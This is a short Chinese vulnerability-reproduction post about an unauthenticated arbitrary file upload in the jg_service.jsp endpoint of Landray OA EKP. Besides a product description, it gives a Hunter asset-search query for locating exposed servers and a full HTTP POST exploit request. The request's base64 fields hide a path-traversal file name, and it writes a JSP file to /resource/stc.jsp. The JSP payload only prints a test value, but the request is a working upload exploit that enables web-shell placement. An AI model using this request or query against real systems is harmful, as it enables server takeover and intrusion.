蓝凌OA EKP jg_service存在任意文件上传漏洞
一、漏洞简介
蓝凌OA EKP,是蓝凌旗下的协同办公平台,其定位在平台型产品,它是结合蓝凌知识管理及移动互联网理念设计,综合企业管理支撑系统发展而来,并将协同办公、知识共享、文化管理、战略管理等融合为一体,通过企业门户统一战线,满足用户个性化办公要求的一体化工作平台。蓝凌OA jg_service接口处存在任意文件上传漏洞,未经过身份认证的攻击者可通过构造压缩文件上传恶意后门文件,远程命令执行,获取服务器权限。
二、漏洞简介
- 蓝凌OA EKP
三、资产测绘
- hunter
app.name="Landray 蓝凌OA" - 特征
四、漏洞复现
POST /sys/attachment/sys_att_main/jg_service.jsp HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.2657.7 Safari/537.36
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
Content-type: application/x-www-form-urlencoded
Content-Length: 206
DBSTEP V3.0 124 0 999
DBSTEP=REJTVEVQ
OPTION=U0FWRUFTSFRNTA==
HTMLNAME=Li4vLi4vLi4vLi4vLi4vZWtwL3Jlc291cmNlL3N0Yy5qc3A=
RECORDID=
DIRECTORY=
<% out.println(111*11);%>
上传文件位置
/resource/stc.jsp